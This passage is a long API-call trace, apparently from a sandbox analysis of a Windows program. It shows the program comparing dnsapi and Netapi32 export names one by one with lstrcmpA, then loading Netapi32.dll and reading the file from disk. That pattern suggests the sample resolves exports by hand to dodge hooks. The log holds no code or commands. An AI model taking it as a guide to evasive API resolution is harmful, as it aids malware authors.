lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0241.163] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.164] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.165] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0241.165] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0241.165] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0241.165] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0241.165] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0241.165] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0241.165] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0241.165] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0241.166] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0241.167] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0241.167] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0241.168] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0241.169] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0241.170] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0241.170] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0241.170] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0241.170] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0241.170] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0241.426] GetProcessHeap () returned 0x550000 [0241.426] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a9d010 | out: hHeap=0x550000) returned 1 [0241.426] GetProcessHeap () returned 0x550000 [0241.426] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x5690b0 [0241.427] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0241.431] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0241.431] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0241.432] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0241.432] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0241.432] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0241.432] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0241.432] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0241.432] GetProcessHeap () returned 0x550000 [0241.433] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13b00) returned 0x2d65030 [0241.433] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0241.433] ReadFile (in: hFile=0x17c, lpBuffer=0x2d65030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d65030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0241.434] CloseHandle (hObject=0x17c) returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0241.434] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0241.435] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0241.436] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0241.437] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0241.437] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0241.438] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", 